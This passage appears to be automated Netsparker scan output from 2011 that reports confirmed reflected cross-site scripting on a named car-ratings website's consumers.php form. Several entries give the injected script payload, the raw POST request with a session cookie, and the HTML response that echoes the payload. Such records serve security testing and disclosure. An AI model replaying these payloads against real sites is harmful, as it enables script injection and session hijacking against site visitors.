href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x000E88)</script>" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="c..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x000F62)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=ucd796b5je81rs2nedvc06vr12
Content-Length: 197
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000F62)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:57:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="'"--></style></script><script>netsparker(0x000F62)</script>" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="c..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x000FB4)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=ucd796b5je81rs2nedvc06vr12
Content-Length: 197
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000FB4)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:57:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="'"--></style></script><script>netsparker(0x000FB4)</script>" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="c..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST '"--></style></script><script>alert(0x000FE7)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=ucd796b5je81rs2nedvc06vr12
Content-Length: 197
Expect: 100-continue
Accept-Encoding: gzip, deflate

